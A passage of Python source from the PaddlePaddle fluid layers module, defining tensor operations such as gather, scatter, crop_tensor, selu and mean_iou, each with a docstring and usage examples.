#fluid.layers.assign(input=x, output=shape_tensor)
#output = fluid.layers.resize_nearest(input=input,out_shape=shape_tensor)
#4
#x = np.array([0.5]).astype("float32")
#scale_tensor = fluid.data(name="scale", shape=[1], dtype="float32")
#fluid.layers.assign(x,scale_tensor)
#output = fluid.layers.resize_nearest(input=input,scale=scale_tensor)
place = fluid.CPUPlace()
exe = fluid.Executor(place)
exe.run(fluid.default_startup_program())
input_data = np.random.rand(2,3,6,10).astype("float32")
output_data = exe.run(fluid.default_main_program(),
feed={"input":input_data},
fetch_list=[output],
return_numpy=True)
print(output_data[0].shape)
#1
# (2, 3, 12, 12)
#2
# (2, 3, 12, 2)
#3
# (2, 3, 3, 12)
#4
# (2, 3, 3, 5)
#imperative mode
import paddle.fluid.dygraph as dg
with dg.guard(place) as g:
input = dg.to_variable(input_data)
output = fluid.layers.resize_nearest(input=input, out_shape=[12,12])
print(output.shape)
# [2L, 3L, 12L, 12L]
"""
return image_resize(
input,
out_shape,
scale,
name,
'NEAREST',
actual_shape,
align_corners,
align_mode=1,
data_format=data_format)
def image_resize_short(input, out_short_len, resample='BILINEAR'):
"""
This op resizes a batch of images. The short edge of input images will be
resized to the given 'out_short_len'. The long edge of input images
will be resized proportionately to make images' length-width ratio
constant.
Parameters:
input (Variable): 4-D tensor(NCHW), The input tensor of image resize layer.
out_short_len(int): The length of output images' short edge.
resample (str): resample method, default: BILINEAR.
Returns:
Variable: 4-D tensor(NCHW).
Examples:
.. code-block:: python
import paddle.fluid as fluid
input = fluid.data(name="input", shape=[None,3,6,9], dtype="float32")
out = fluid.layers.image_resize_short(input, out_short_len=3)
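The resulting shape can be worked out by hand; the snippet below is a hedged sketch of the arithmetic (the +0.5 truncation mirrors the implementation of this op):
.. code-block:: python
    in_h, in_w, out_short_len = 6, 9, 3
    short, long_ = min(in_h, in_w), max(in_h, in_w)
    new_long = int(float(long_) * (float(out_short_len) / float(short)) + 0.5)
    # short edge 6 -> 3, long edge 9 -> new_long == 5, so the output spatial size is 3 x 5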
"""
in_shape = input.shape
if len(in_shape) != 4:
raise ValueError(
"The rank of input must be 4 (num_batches, channels, in_h, in_w).")
hw = in_shape[2:4]
short_idx = hw.index(min(hw))
long_idx = 1 - short_idx
out_shape = list(hw)
out_shape[short_idx] = out_short_len
out_shape[long_idx] = int(
float(out_shape[long_idx]) * (float(out_short_len) / float(hw[
short_idx])) + 0.5)
return image_resize(input=input, out_shape=out_shape, resample=resample)
def gather(input, index, overwrite=True):
"""
**Gather Layer**
Output is obtained by gathering entries of the outer-most dimension
of X indexed by `index` and concatenate them together.
.. math::
Out = X[Index]
.. code-block:: text
Given:
X = [[1, 2],
[3, 4],
[5, 6]]
Index = [1, 2]
Then:
Out = [[3, 4],
[5, 6]]
Args:
input (Variable): The source input tensor with rank>=1. Supported data type is
int32, int64, float32, float64 and uint8 (only for CPU),
float16 (only for GPU).
index (Variable): The index input tensor with rank=1. Data type is int32 or int64.
overwrite (bool, optional): The mode for updating the grad when there are repeated indices.
If True, use the overwrite mode to update the grad of the same index,
if False, use the accumulate mode to update the grad of the same index.
Default value is True.
Returns:
output (Variable): The output is a tensor with the same rank as input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name='x', shape=[-1, 5], dtype='float32')
index = fluid.data(name='index', shape=[-1, 1], dtype='int32')
output = fluid.layers.gather(x, index)
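For the forward result, the text example above is plain row indexing; the numpy sketch below is a hedged equivalence (gradient behaviour, controlled by ``overwrite``, is not covered):
.. code-block:: python
    import numpy as np
    X = np.array([[1, 2], [3, 4], [5, 6]])
    index = np.array([1, 2])
    out = X[index]            # same as np.take(X, index, axis=0)
    # out == [[3, 4], [5, 6]]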
"""
helper = LayerHelper('gather', **locals())
dtype = helper.input_dtype()
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="gather",
inputs={"X": input,
"Index": index},
outputs={"Out": out},
attrs={'overwrite': overwrite})
return out
def gather_nd(input, index, name=None):
"""
**Gather Nd Layer**
This function is actually a high-dimensional extension of :code:`gather`
and supports simultaneous indexing by multiple axes. :attr:`index` is a
K-dimensional integer tensor, which is regarded as a (K-1)-dimensional
tensor of indices into :attr:`input`, where each element defines
a slice of params:
.. math::
output[(i_0, ..., i_{K-2})] = input[index[(i_0, ..., i_{K-2})]]
Obviously, :code:`index.shape[-1] <= input.rank` . And, the output tensor has
shape :code:`index.shape[:-1] + input.shape[index.shape[-1]:]` .
.. code-block:: text
Given:
input = [[[ 0, 1, 2, 3],
[ 4, 5, 6, 7],
[ 8, 9, 10, 11]],
[[12, 13, 14, 15],
[16, 17, 18, 19],
[20, 21, 22, 23]]]
input.shape = (2, 3, 4)
* Case 1:
index = [[1]]
gather_nd(input, index)
= [input[1, :, :]]
= [[12, 13, 14, 15],
[16, 17, 18, 19],
[20, 21, 22, 23]]
* Case 2:
index = [[0,2]]
gather_nd(input, index)
= [input[0, 2, :]]
= [8, 9, 10, 11]
* Case 3:
index = [[1, 2, 3]]
gather_nd(input, index)
= [input[1, 2, 3]]
= [23]
Args:
input (Variable): The source input. Its dtype should be int32, int64, float32, float64.
index (Variable): The index input with rank > 1, index.shape[-1] <= input.rank.
Its dtype should be int32, int64.
name (str|None): A name for this layer(optional). If set None, the
layer will be named automatically.
Returns:
output (Variable): A tensor with the shape index.shape[:-1] + input.shape[index.shape[-1]:]
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name='x', shape=[3, 4, 5], dtype='float32')
index = fluid.data(name='index', shape=[2, 2], dtype='int32')
output = fluid.layers.gather_nd(x, index)
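Each row of ``index`` is an ordinary multi-axis index, so the three cases above can be cross-checked with numpy indexing (a hedged sketch of the forward semantics only):
.. code-block:: python
    import numpy as np
    inp = np.arange(24).reshape(2, 3, 4)
    print(inp[tuple([1])].tolist())        # Case 1: inp[1, :, :]
    print(inp[tuple([0, 2])].tolist())     # Case 2: inp[0, 2, :] -> [8, 9, 10, 11]
    print(inp[tuple([1, 2, 3])].tolist())  # Case 3: inp[1, 2, 3] -> 23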
"""
helper = LayerHelper('gather_nd', **locals())
dtype = helper.input_dtype()
output = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="gather_nd",
inputs={"X": input,
"Index": index},
outputs={"Out": output})
return output
def scatter(input, index, updates, name=None, overwrite=True):
"""
**Scatter Layer**
Output is obtained by updating the input on selected indices based on updates.
.. code-block:: python
import numpy as np
#input:
input = np.array([[1, 1], [2, 2], [3, 3]])
index = np.array([2, 1, 0, 1])
# the first dimension of updates matches the length of index; the remaining dimensions match input
updates = np.array([[1, 1], [2, 2], [3, 3], [4, 4]])
overwrite = False
# calculation:
if not overwrite:
for i in range(len(index)):
input[index[i]] = np.zeros((2))
for i in range(len(index)):
if (overwrite):
input[index[i]] = updates[i]
else:
input[index[i]] += updates[i]
# output:
out = np.array([[3, 3], [6, 6], [1, 1]])
out.shape # [3, 2]
Args:
input (Variable): The input N-D Tensor with rank>=1. Data type can be float32.
index (Variable): The index 1-D Tensor. Data type can be int32, int64. The length of index cannot exceed updates' length, and the values in index cannot exceed input's length.
updates (Variable): Update input with the updates parameter based on index. Its first dimension should match the length of index, and the remaining dimensions should be the same as input.
name(str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name` .
overwrite (bool): The mode for updating the output when there are repeated indices.
If True, use the overwrite mode to update the output of the same index,
if False, use the accumulate mode to update the output of the same index.
Default value is True.
Returns:
Variable(Tensor|LoDTensor): The output is a Tensor with the same shape as input.
Examples:
.. code-block:: python
import numpy as np
import paddle.fluid as fluid
input = fluid.layers.data(name='data', shape=[3, 2], dtype='float32', append_batch_size=False)
index = fluid.layers.data(name='index', shape=[4], dtype='int64', append_batch_size=False)
updates = fluid.layers.data(name='update', shape=[4, 2], dtype='float32', append_batch_size=False)
output = fluid.layers.scatter(input, index, updates, overwrite=False)
exe = fluid.Executor(fluid.CPUPlace())
exe.run(fluid.default_startup_program())
in_data = np.array([[1, 1], [2, 2], [3, 3]]).astype(np.float32)
index_data = np.array([2, 1, 0, 1]).astype(np.int64)
update_data = np.array([[1, 1], [2, 2], [3, 3], [4, 4]]).astype(np.float32)
res = exe.run(fluid.default_main_program(), feed={'data':in_data, "index":index_data, "update":update_data}, fetch_list=[output])
print(res)
# [array([[3., 3.],
# [6., 6.],
# [1., 1.]], dtype=float32)]
"""
helper = LayerHelper('scatter', **locals())
dtype = helper.input_dtype()
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="scatter",
inputs={"X": input,
"Ids": index,
"Updates": updates},
attrs={'overwrite': overwrite},
outputs={"Out": out})
return out
def scatter_nd_add(ref, index, updates, name=None):
"""
**Scatter_nd_add Layer**
Output is obtained by applying sparse addition to a single value
or slice in a Variable.
:attr:`ref` is a Tensor with rank :math:`R`
and :attr:`index` is a Tensor with rank :math:`K` . Thus, :attr:`index`
has shape :math:`[i_0, i_1, ..., i_{K-2}, Q]` where :math:`Q \leq R` . :attr:`updates`
is a Tensor with rank :math:`K - 1 + R - Q` and its
shape is :math:`index.shape[:-1] + ref.shape[index.shape[-1]:]` .
According to the :math:`[i_0, i_1, ..., i_{K-2}]` of :attr:`index` ,
add the corresponding :attr:`updates` slice to the :attr:`ref` slice
which is obtained by the last one dimension of :attr:`index` .
.. code-block:: text
Given:
* Case 1:
ref = [0, 1, 2, 3, 4, 5]
index = [[1], [2], [3], [1]]
updates = [9, 10, 11, 12]
we get:
output = [0, 22, 12, 14, 4, 5]
* Case 2:
ref = [[65, 17], [-14, -25]]
index = [[], []]
updates = [[[-1, -2], [1, 2]],
[[3, 4], [-3, -4]]]
ref.shape = (2, 2)
index.shape = (2, 0)
updates.shape = (2, 2, 2)
we get:
output = [[67, 19], [-16, -27]]
Args:
ref (Variable): The ref input. Its dtype should be float32, float64.
index (Variable): The index input with rank > 1 and index.shape[-1] <= ref.rank.
Its dtype should be int32 or int64 as it is used as indexes.
updates (Variable): The updated value of scatter_nd_add op, and it must have the same dtype
as ref. It must have the shape index.shape[:-1] + ref.shape[index.shape[-1]:].
name (str|None): The output variable name. If set None, the layer will be named automatically.
Returns:
output (Variable): The output is a tensor with the same shape and dtype as ref.
Examples:
.. code-block:: python
import paddle.fluid as fluid
ref = fluid.data(name='ref', shape=[3, 5, 9, 10], dtype='float32')
index = fluid.data(name='index', shape=[3, 2], dtype='int32')
updates = fluid.data(name='update', shape=[3, 9, 10], dtype='float32')
output = fluid.layers.scatter_nd_add(ref, index, updates)
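For 1-D indices, Case 1 above performs the same accumulation as ``numpy.add.at`` (a hedged cross-check, not the fluid op):
.. code-block:: python
    import numpy as np
    ref_np = np.array([0, 1, 2, 3, 4, 5])
    index_np = np.array([1, 2, 3, 1])
    updates_np = np.array([9, 10, 11, 12])
    np.add.at(ref_np, index_np, updates_np)
    # ref_np == [0, 22, 12, 14, 4, 5], matching Case 1 above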
"""
if ref.dtype != updates.dtype:
raise ValueError("ref and updates must have same data type.")
helper = LayerHelper('scatter_nd_add', **locals())
dtype = helper.input_dtype(input_param_name='ref')
output = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="scatter_nd_add",
inputs={"X": ref,
"Index": index,
"Updates": updates},
outputs={"Out": output})
return output
def scatter_nd(index, updates, shape, name=None):
"""
**Scatter_nd Layer**
Output is obtained by scattering the :attr:`updates` in a new tensor according
to :attr:`index` . This op is similar to :code:`scatter_nd_add`, except the
tensor of :attr:`shape` is zero-initialized. Correspondingly, :code:`scatter_nd(index, updates, shape)`
is equal to :code:`scatter_nd_add(fluid.layers.zeros(shape, updates.dtype), index, updates)` .
If :attr:`index` has repeated elements, then the corresponding updates are accumulated.
Because of numerical approximation issues, a different order of repeated elements
in :attr:`index` may cause different results. The specific calculation method can be
seen :code:`scatter_nd_add` . This op is the inverse of the :code:`gather_nd` op.
Args:
index (Variable): The index input with rank > 1 and index.shape[-1] <= len(shape).
Its dtype should be int32 or int64 as it is used as indexes.
updates (Variable): The updated value of scatter_nd op. Its dtype should be float32, float64.
It must have the shape index.shape[:-1] + shape[index.shape[-1]:]
shape(tuple|list): Shape of output tensor.
name (str|None): The output variable name. If set None, the layer will be named automatically.
Returns:
output (Variable): The output is a tensor with the same type as :attr:`updates` .
Examples:
.. code-block:: python
import paddle.fluid as fluid
index = fluid.data(name='index', shape=[3, 2], dtype='int64')
updates = fluid.data(name='update', shape=[3, 9, 10], dtype='float32')
shape = [3, 5, 9, 10]
output = fluid.layers.scatter_nd(index, updates, shape)
"""
return scatter_nd_add(zeros(shape, updates.dtype), index, updates, name)
@templatedoc()
def random_crop(x, shape, seed=None):
"""
${comment}
Args:
x(${x_type}): ${x_comment}
shape(${shape_type}): ${shape_comment}
seed(int|${seed_type}|None): ${seed_comment} By default, the seed will
be obtained from `random.randint(-65536, 65535)`.
Returns:
${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
img = fluid.data("img", [None, 3, 256, 256])
# cropped_img is [-1, 3, 224, 224]
cropped_img = fluid.layers.random_crop(img, shape=[3, 224, 224])
# cropped_img2 shape: [-1, 2, 224, 224]
# cropped_img2 = fluid.layers.random_crop(img, shape=[2, 224, 224])
# cropped_img3 shape: [-1, 3, 128, 224]
# cropped_img3 = fluid.layers.random_crop(img, shape=[128, 224])
"""
helper = LayerHelper("random_crop", **locals())
dtype = x.dtype
out = helper.create_variable_for_type_inference(dtype)
if seed is None:
seed = np.random.randint(-65536, 65536)
op_attrs = {"shape": shape}
if isinstance(seed, int):
op_attrs["startup_seed"] = seed
seed = helper.create_variable(
name=unique_name.generate("random_crop_seed"),
dtype="int64",
persistable=True)
elif not isinstance(seed, Variable):
raise ValueError("'seed' must be a Variable or an int.")
helper.append_op(
type="random_crop",
inputs={"X": x,
"Seed": seed},
outputs={"Out": out,
"SeedOut": seed},
attrs=op_attrs)
return out
def log(x, name=None):
"""
Calculates the natural log of the given input tensor, element-wise.
.. math::
Out = \\ln(x)
Args:
x (Variable): Input LoDTensor or Tensor. Must be one of the following types: float32, float64.
name (str|None): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`
Returns:
Variable: The natural log of the input LoDTensor or Tensor computed element-wise.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
# Graph Organizing
x = fluid.layers.data(name="x", shape=[1], dtype="float32")
res = fluid.layers.log(x)
# Create an executor using CPU as an example
exe = fluid.Executor(fluid.CPUPlace())
# Execute
x_i = np.array([[1], [2]]).astype(np.float32)
res_val, = exe.run(fluid.default_main_program(), feed={'x':x_i}, fetch_list=[res])
print(res_val) # [[0.], [0.6931472]]
"""
if in_dygraph_mode():
return core.ops.log(x)
check_variable_and_dtype(x, 'x', ['float32', 'float64'], "log")
inputs = {'X': [x]}
helper = LayerHelper('log', **locals())
dtype = helper.input_dtype(input_param_name='x')
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(type="log", inputs={"X": x}, outputs={"Out": out})
return out
@templatedoc()
def relu(x, name=None):
"""
${comment}
Args:
x(Variable): ${x_comment}
name(str, optional): The default value is None. Normally there is no
need for user to set this property. For more information, please
refer to :ref:`api_guide_Name`.
Returns:
Variable: ${out_comment}
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
in1 = np.array([[-1,0],[1,2.6]])
with fluid.dygraph.guard():
x1 = fluid.dygraph.to_variable(in1)
out1 = fluid.layers.relu(x1)
print(out1.numpy())
# [[0. 0. ]
# [1. 2.6]]
"""
if in_dygraph_mode():
return core.ops.relu(x)
check_variable_and_dtype(x, 'x', ['float16', 'float32', 'float64'], 'relu')
inputs = {'X': [x]}
helper = LayerHelper('relu', **locals())
dtype = helper.input_dtype(input_param_name='x')
out = helper.create_variable_for_type_inference(dtype)
helper.append_op(
type="relu", inputs={"X": helper.input('x')}, outputs={"Out": out})
return out
def selu(x, scale=None, alpha=None, name=None):
"""
Selu Operator.
The equation is:
.. math::
selu= \\lambda*
\\begin{cases}
x &\\quad \\text{ if } x>0 \\\\
\\alpha * e^x - \\alpha &\\quad \\text{ if } x<=0
\\end{cases}
The input `X` can carry the LoD (Level of Details) information,
or not. And the output shares the LoD information with input `X`.
Args:
x (Variable): The input N-D Tensor.
scale(float, optional): lambda in selu activation function,
the default value is 1.0507009873554804934193349852946.
For more information about this value, please refer
to: https://arxiv.org/abs/1706.02515.
alpha(float, optional): alpha in selu activation function,
the default value is 1.6732632423543772848170429916717.
For more information about this value, please refer
to: https://arxiv.org/abs/1706.02515.
name(str, optional): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
Variable(Tensor|LoDTensor): The output Tensor or LoDTensor with the same shape and LoD information as input.
Examples:
.. code-block:: python
import paddle.fluid as fluid
import numpy as np
inputs = fluid.layers.data(name="x", shape=[2, 2], dtype="float32")
output = fluid.layers.selu(inputs)
exe = fluid.Executor(fluid.CPUPlace())
exe.run(fluid.default_startup_program())
img = np.array([[0, 1],[2, 3]]).astype(np.float32)
res = exe.run(fluid.default_main_program(), feed={'x':img}, fetch_list=[output])
print(res) # [array([[0. , 1.050701],[2.101402, 3.152103]], dtype=float32)]
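The printed values follow directly from the equation; the numpy sketch below is a hedged re-computation using the default scale and alpha:
.. code-block:: python
    import numpy as np
    scale = 1.0507009873554804934193349852946
    alpha = 1.6732632423543772848170429916717
    x_np = np.array([[0., 1.], [2., 3.]])
    out_np = scale * np.where(x_np > 0, x_np, alpha * np.exp(x_np) - alpha)
    # out_np ~= [[0., 1.050701], [2.101402, 3.152103]]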
"""
check_variable_and_dtype(x, 'x', ['float32', 'float64'], 'selu')
helper = LayerHelper('selu', **locals())
dtype = helper.input_dtype(input_param_name='x')
out = helper.create_variable_for_type_inference(dtype)
attrs = {}
if scale is not None:
attrs["scale"] = scale
if alpha is not None:
attrs["alpha"] = alpha
helper.append_op(
type="selu", inputs={"X": x}, outputs={"Out": out}, attrs=attrs)
return out
def mean_iou(input, label, num_classes):
"""
Mean Intersection-Over-Union is a common evaluation metric for
semantic image segmentation, which first computes the IOU for each
semantic class and then computes the average over classes.
IOU is defined as follows:
.. math::
IOU = \\frac{true\_positive}{(true\_positive + false\_positive + false\_negative)}.
The predictions are accumulated in a confusion matrix and mean-IOU
is then calculated from it.
Parameters:
input (Variable): An n-D Tensor of prediction results for semantic labels with type int32 or int64.
label (Variable): A Tensor of ground truth labels with type int32 or int64.
Its shape should be the same as input.
num_classes (int32): The possible number of labels.
Returns:
Three Variables.
- mean_iou(Variable) : A 1-D Tensor representing the mean intersection-over-union with shape [1]. \
Data type is float32.
- out_wrong(Variable) : A 1-D Tensor with shape [num_classes]. Data type is int32. \
The wrong numbers of each class.
- out_correct(Variable): A 1-D Tensor with shape [num_classes]. Data type is int32. The correct numbers of each class.
Examples:
.. code-block:: python
import paddle.fluid as fluid
iou_shape = [None, 32, 32]
num_classes = 5
predict = fluid.data(name='predict', shape=iou_shape, dtype='int64')
label = fluid.data(name='label', shape=iou_shape, dtype='int64')
mean_iou, out_wrong, out_correct = fluid.layers.mean_iou(predict, label,
num_classes)
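The metric itself can be sketched in numpy via a confusion matrix (hedged: ``mean_iou_np`` is a hypothetical helper for illustration, it assumes integer prediction/label arrays, and unlike the fluid op it does not return the per-class wrong/correct counts):
.. code-block:: python
    import numpy as np
    def mean_iou_np(pred, label, num_classes):
        # flatten, then build the confusion matrix cm[label][pred]
        pred, label = pred.reshape(-1), label.reshape(-1)
        cm = np.bincount(label * num_classes + pred,
                         minlength=num_classes * num_classes)
        cm = cm.reshape(num_classes, num_classes)
        tp = np.diag(cm)
        union = cm.sum(axis=0) + cm.sum(axis=1) - tp
        valid = union > 0
        return (tp[valid].astype('float32') / union[valid]).mean()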
"""
helper = LayerHelper('mean_iou', **locals())
dtype = helper.input_dtype()
out_mean_iou = helper.create_variable_for_type_inference(dtype='float32')
out_wrong = helper.create_variable_for_type_inference(dtype='int32')
out_correct = helper.create_variable_for_type_inference(dtype='int32')
helper.append_op(
type="mean_iou",
inputs={"Predictions": input,
"Labels": label},
outputs={
"OutMeanIou": out_mean_iou,
"OutWrong": out_wrong,
"OutCorrect": out_correct
},
attrs={"num_classes": num_classes})
return out_mean_iou, out_wrong, out_correct
def crop(x, shape=None, offsets=None, name=None):
"""
Crop input into output, as specified by offsets and shape.
**Warning:** THIS OP IS DEPRECATED. It will be removed in the future version.
Instructions for updating: Use :ref:`api_fluid_layers_crop_tensor` instead.
.. code-block:: text
* Case 1:
Given
X = [[0, 1, 2, 0, 0]
[0, 3, 4, 0, 0]
[0, 0, 0, 0, 0]],
and
shape = [2, 2],
offsets = [0, 1],
output is:
Out = [[1, 2],
[3, 4]].
* Case 2:
Given
X = [[0, 1, 2, 5, 0]
[0, 3, 4, 6, 0]
[0, 0, 0, 0, 0]],
and shape is tensor
shape = [[0, 0, 0]
[0, 0, 0]]
and
offsets = [0, 1],
output is:
Out = [[1, 2, 5],
[3, 4, 6]].
Parameters:
x (Variable): Tensor, data type can be float32 or float64.
shape (Variable|list/tuple of integers): The output shape is specified
by `shape`, which can be a Tensor or a list/tuple of integers.
If it is a Tensor, its rank must be the same as `x`; only
its shape will be used, and its value will be ignored. This way
is suitable for the case that the output shape may be changed each
iteration. If it is a list/tuple of integers, its length must be the same
as the rank of `x`.
offsets (Variable|list/tuple of integers|None): Specifies the cropping
offsets at each dimension. It can be a Tensor or a list/tuple
of integers. If it is a Tensor, its rank must be the same as `x`.
This way is suitable for the case that the offsets may be changed
each iteration. If it is a list/tuple of integers, its length must be the
same as the rank of `x`. If None, the offsets are 0 at each dimension.
name(str, optional): For detailed information, please refer
to :ref:`api_guide_Name` . Usually name is no need to set and
None by default.
Returns:
The cropped Tensor, which has the same rank and data type as `x`
Return Type:
Variable
Raises:
ValueError: If shape is not a list, tuple or Variable.
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name="x", shape=[3, 3, 5], dtype="float32")
y = fluid.data(name="y", shape=[2, 2, 3], dtype="float32")
crop = fluid.layers.crop(x, shape=y)
# or
z = fluid.data(name="z", shape=[3, 3, 5], dtype="float32")
crop = fluid.layers.crop(z, shape=[2, 2, 3])
"""
helper = LayerHelper('crop', **locals())
if not (isinstance(shape, list) or isinstance(shape, tuple) or \
isinstance(shape, Variable)):
raise ValueError("The shape should be a list, tuple or Variable.")
if offsets is None:
offsets = [0] * len(x.shape)
out = helper.create_variable_for_type_inference(x.dtype)
ipts = {'X': x}
attrs = {}
if isinstance(shape, Variable):
ipts['Y'] = shape
else:
attrs['shape'] = shape
if isinstance(offsets, Variable):
ipts['Offsets'] = offsets
else:
attrs['offsets'] = offsets
helper.append_op(
type='crop',
inputs=ipts,
outputs={'Out': out},
attrs=None if len(attrs) == 0 else attrs)
return out
def crop_tensor(x, shape=None, offsets=None, name=None):
"""
Crop input into output, as specified by offsets and shape.
.. code-block:: text
* Case 1 (input is a 2-D Tensor):
Input:
X.shape = [3, 5]
X.data = [[0, 1, 2, 0, 0],
[0, 3, 4, 0, 0],
[0, 0, 0, 0, 0]]
Parameters:
shape = [2, 2]
offsets = [0, 1]
Output:
Out.shape = [2, 2]
Out.data = [[1, 2],
[3, 4]]
* Case 2 (input is a 3-D Tensor):
Input:
X.shape = [2, 3, 4]
X.data = [[[0, 1, 2, 3],
[0, 5, 6, 7],
[0, 0, 0, 0]],
[[0, 3, 4, 5],
[0, 6, 7, 8],
[0, 0, 0, 0]]]
Parameters:
shape = [2, 2, -1]
offsets = [0, 0, 1]
Output:
Out.shape = [2, 2, 3]
Out.data = [[[1, 2, 3],
[5, 6, 7]],
[[3, 4, 5],
[6, 7, 8]]]
Parameters:
x (Variable): 1-D to 6-D Tensor, the data type is float32, float64, int32 or int64.
shape (list|tuple|Variable): The output shape is specified
by `shape`. Its data type is int32. If a list/tuple, its length must be
the same as the dimension size of `x`. If a Variable, it should be a 1-D Tensor.
When it is a list, each element can be an integer or a Tensor of shape: [1].
If Variable contained, it is suitable for the case that the shape may
be changed each iteration.
offsets (list|tuple|Variable, optional): Specifies the cropping
offsets at each dimension. Its data type is int32. If a list/tuple, its length
must be the same as the dimension size of `x`. If a Variable, it should be a 1-D
Tensor. When it is a list, each element can be an integer or a Tensor of shape: [1].
If Variable contained, it is suitable for the case that the offsets may be changed
each iteration. Default: None, the offsets are 0 at each dimension.
name(str, optional): The default value is None. Normally there is no need for user to set
this property. For more information, please refer to :ref:`api_guide_Name` .
Returns:
Variable: The cropped Tensor has same data type with `x`.
Raises:
TypeError: If the data type of `x` is not in: float32, float64, int32, int64.
TypeError: If `shape` is not a list, tuple or Variable.
TypeError: If the data type of `shape` is not int32.
TypeError: If `offsets` is not None and not a list, tuple or Variable.
TypeError: If the data type of `offsets` is not int32.
ValueError: If the element in `offsets` is less than zero.
Examples:
.. code-block:: python
import paddle.fluid as fluid
x = fluid.data(name="x", shape=[None, 3, 5], dtype="float32")
# x.shape = [-1, 3, 5], where -1 indicates batch size, and it will get the exact value in runtime.
# shape is a 1-D Tensor
crop_shape = fluid.data(name="crop_shape", shape=[3], dtype="int32")
crop0 = fluid.layers.crop_tensor(x, shape=crop_shape)
# crop0.shape = [-1, -1, -1], it means crop0.shape[0] = x.shape[0] in runtime.
# or shape is a list in which each element is a constant
crop1 = fluid.layers.crop_tensor(x, shape=[-1, -1, 3], offsets=[0, 1, 0])
# crop1.shape = [-1, 2, 3]
# or shape is a list in which each element is a constant or Variable
y = fluid.data(name="y", shape=[3, 8, 8], dtype="float32")
dim1 = fluid.data(name="dim1", shape=[1], dtype="int32")
crop2 = fluid.layers.crop_tensor(y, shape=[3, dim1, 4])
# crop2.shape = [3, -1, 4]
# offsets is a 1-D Tensor
crop_offsets = fluid.data(name="crop_offsets", shape=[3], dtype="int32")
crop3 = fluid.layers.crop_tensor(x, shape=[-1, 2, 3], offsets=crop_offsets)
# crop3.shape = [-1, 2, 3]
# offsets is a list in which each element is a constant or Variable
offsets_var = fluid.data(name="dim1", shape=[1], dtype="int32")
crop4 = fluid.layers.crop_tensor(x, shape=[-1, 2, 3], offsets=[0, 1, offsets_var])
# crop4.shape = [-1, 2, 3]
"""
helper = LayerHelper('crop_tensor', **locals())
check_variable_and_dtype(x, 'x', ['float32', 'float64', 'int32', 'int64'],
'crop_tensor')
check_type(shape, 'shape', (list, tuple, Variable), 'crop_tensor')
check_type(offsets, 'offsets', (list, tuple, Variable, type(None)),
'crop_tensor')
if offsets is None:
offsets = [0] * len(x.shape)
out = helper.create_variable_for_type_inference(x.dtype)
ipts = {'X': x}
attrs = {}
def _attr_shape_check(shape_val):
if not isinstance(shape_val, int):
raise TypeError(
"Attr(shape)'s dtype of Op(crop_tensor) should be int32, but received: %s."
% type(shape_val))
if shape_val == 0:
raise ValueError(
"Attr(shape) of Op(crop_tensor) should not be zero, but received: %s."
% str(shape_val))
if shape_val < -1:
raise ValueError(
"When the element in Attr(shape) of Op(crop_tensor) is negative, only -1 is supported, but received: %s."
% str(shape_val))
def _attr_offsets_check(offset_val):
if not isinstance(offset_val, int):
raise TypeError(
"Attr(offsets)'s dtype of Op(crop_tensor) should be int32, but received: %s."
% type(offset_val))
if offset_val < 0:
raise ValueError(
"Attr(offsets) of Op(crop_tensor) should be greater or equal to zero, but received: %s."
% str(offset_val))
if isinstance(offsets, Variable):
offsets.stop_gradient = True
ipts['Offsets'] = offsets
attrs['offsets'] = [-1] * len(x.shape)
elif utils._contain_var(offsets):
new_offsets_tensor = []
offsets_attr = []
for dim in offsets:
if isinstance(dim, Variable):
dim.stop_gradient = True
new_offsets_tensor.append(dim)
offsets_attr.append(-1)
else:
_attr_offsets_check(dim)
temp_out = helper.create_variable_for_type_inference('int32')
fill_constant([1], 'int32', dim, force_cpu=True, out=temp_out)
new_offsets_tensor.append(temp_out)
offsets_attr.append(dim)
ipts['OffsetsTensor'] = new_offsets_tensor
attrs['offsets'] = offsets_attr
else:
for offset in offsets:
_attr_offsets_check(offset)
attrs['offsets'] = offsets
if isinstance(shape, Variable):
shape.stop_gradient = True
ipts['Shape'] = shape
elif utils._contain_var(shape):
new_shape_tensor = []
shape_attr = []
for dim_size in shape:
if isinstance(dim_size, Variable):
dim_size.stop_gradient = True
new_shape_tensor.append(dim_size)
shape_attr.append(0)
else:
_attr_shape_check(dim_size)
temp_out = helper.create_variable_for_type_inference('int32')
fill_constant(
[1], 'int32', dim_size, force_cpu=True, out=temp_out)
new_shape_tensor.append(temp_out)
shape_attr.append(dim_size)
ipts['ShapeTensor'] = new_shape_tensor
attrs['shape'] = shape_attr
else:
for dim_size in shape:
_attr_shape_check(dim_size)
attrs['shape'] = shape
helper.append_op(
type='crop_tensor',
inputs=ipts,
outputs={'Out': out},
attrs=None if len(attrs) == 0 else attrs)
return out
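# Illustrative sketch (not part of the original API): the cropping semantics of
# crop_tensor expressed with plain NumPy slicing; -1 in ``shape`` keeps the rest
# of that dimension, matching Case 2 in the docstring. The helper name and the
# NumPy inputs are assumptions for illustration only.
def _crop_tensor_numpy_sketch(x, shape, offsets=None):
    import numpy as np
    x = np.asarray(x)
    offsets = [0] * x.ndim if offsets is None else offsets
    index = []
    for off, size, dim in zip(offsets, shape, x.shape):
        end = dim if size == -1 else off + size
        index.append(slice(off, end))
    return x[tuple(index)]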
def affine_grid(theta, out_shape, name=None):
"""
It generates a grid of (x,y) coordinates using the parameters of
the affine transformation that correspond to a set of points where
the input feature map should be sampled to produce the transformed
output feature map.
Args:
theta (Variable) - A Tensor with shape [N, 2, 3]. It contains a batch of affine transform parameters.
The data type can be float32 or float64.
out_shape (Variable | list | tuple): The shape of target output with format [batch_size, channel, height, width].
``out_shape`` can be a Tensor or a list or tuple. The data
type must be int32.
name(str|None): The default value is None. Normally there is no need for user to set this property. For more information, please refer to :ref:`api_guide_Name`.
Returns:
